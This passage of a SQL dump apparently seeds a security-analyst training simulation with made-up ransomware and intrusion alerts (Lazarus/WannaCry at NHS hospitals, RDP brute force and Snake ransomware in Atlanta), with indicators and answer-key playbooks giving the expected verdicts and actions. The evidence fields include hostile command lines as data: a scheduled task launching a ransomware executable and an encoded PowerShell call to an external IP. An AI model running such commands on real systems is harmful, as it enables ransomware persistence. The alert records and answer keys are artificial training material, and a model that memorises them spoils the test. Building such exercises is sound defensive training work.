Group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in persistence mechanism by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used for task creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(923, 'Lateral Movement Across NHS Networks', 'critical', 'Network Traffic Analysis', 'Detected lateral movement activity attempting to propagate ransomware across NHS networks. The activity was observed leveraging existing vulnerabilities to spread to additional hospital trusts.', 'Network Propagation', 'T1570', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:27Z\",\"event_id\":\"NW-849302\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.1.2.33\",\"external_ip\":\"203.0.113.45\",\"malware_filename\":\"ransomware_payload.exe\",\"hash\":\"f2b8e1182f3c4e4d7e5d1234567890ab\",\"protocol\":\"SMB\",\"user\":\"nhs_admin\",\"action\":\"propagation_attempt\",\"status\":\"failed\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP used within the NHS network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP of another NHS system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2b8e1182f3c4e4d7e5d1234567890ab\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as ransomware payload linked to Lazarus Group activity.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Custom Threat Database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with known ransomware campaigns.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"nhs_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate admin user account within NHS.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(924, 'Disrupting Hospital Operations - Step 5', 'critical', 'Hospital IT Incident Reports', 'Critical hospital operations, including surgeries, are canceled, triggering a healthcare crisis that underscores the attack\'s severity and the urgency of restoring systems. Advanced destructive malware attributed to the Lazarus Group has been detected within the hospital network, actively disrupting services.', 'Operational Disruption', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"event_id\":\"evt-2023-10-15-0005\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.25\",\"malware_name\":\"WannaCry\",\"malware_hash\":\"09f7e02f1290be211da707a266f153b3\",\"affected_system\":\"hospital_surgery_scheduling_system\",\"user\":\"jdoe\",\"action\":\"encryption\",\"filename\":\"critical_schedule_data.enc\",\"severity\":\"critical\",\"log_message\":\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group Command & Control Server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Scan\",\"verdict\":\"internal\",\"details\":\"Hospital Surgery Scheduling System\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"09f7e02f1290be211da707a266f153b3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"WannaCry ransomware variant\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"critical_schedule_data.enc\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident Report\",\"verdict\":\"malicious\",\"details\":\"Encrypted hospital scheduling data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(925, 'Accidental Discovery of Kill-Switch Domain', 'critical', 'Threat Intelligence Reports', 'A security researcher accidentally discovered a kill-switch domain, halting the spread of a ransomware linked to the Lazarus Group. This discovery provided a temporary reprieve in the incident response against the ransomware attack, showcasing a pivotal learning moment in handling such incidents.', 'Incident Response', 'T1489: Service Stop', 1, 'resolved', NULL, '{\"event_id\":\"5678\",\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.55\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"kill_switch_domain\":\"killswitch.example.com\",\"user\":\"researcher01\",\"filename\":\"ransomware_payload.exe\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a detected ransomware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"killswitch.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"suspicious\",\"details\":\"Domain recognized as a kill-switch for specific ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Executable known to deploy ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(926, 'Initial Access: RDP Brute-Force Detection', 'high', 'Firewall logs', 'Unauthorized attempts to gain access to the Atlanta municipal network were detected via brute-force attacks targeting RDP services. An external IP was observed making numerous login attempts within a short time frame.', 'Initial Access', 'T1110.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:27Z\",\"event_type\":\"RDP Brute-Force Attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username_attempted\":\"administrator\",\"login_status\":\"failed\",\"attempt_count\":25,\"firewall_action\":\"blocked\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"RDPBruteForceTool.exe\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple brute-force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal RDP server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"clean\",\"details\":\"Commonly targeted username.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Associated with known brute-force tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"RDPBruteForceTool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Known brute-force attack tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(927, 'Execution: Malicious Payload Deployment', 'critical', 'Endpoint detection and response (EDR) systems', 'Following successful access, the attackers executed the ransomware to encrypt critical municipal data, escalating the attack. The ransomware payload was identified on the compromised systems, initiating encryption of sensitive files.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"execution\",\"hostname\":\"municipality-server-01\",\"username\":\"j.doe\",\"process_name\":\"ransomware.exe\",\"process_id\":2954,\"file_path\":\"C:\\\\Users\\\\j.doe\\\\Downloads\\\\ransomware.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"destination_port\":445,\"action\":\"file executed\",\"detected_by\":\"EDR\",\"malware_family\":\"Snake Ransomware\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the Snake Ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with ransomware activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account that initiated the execution on the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
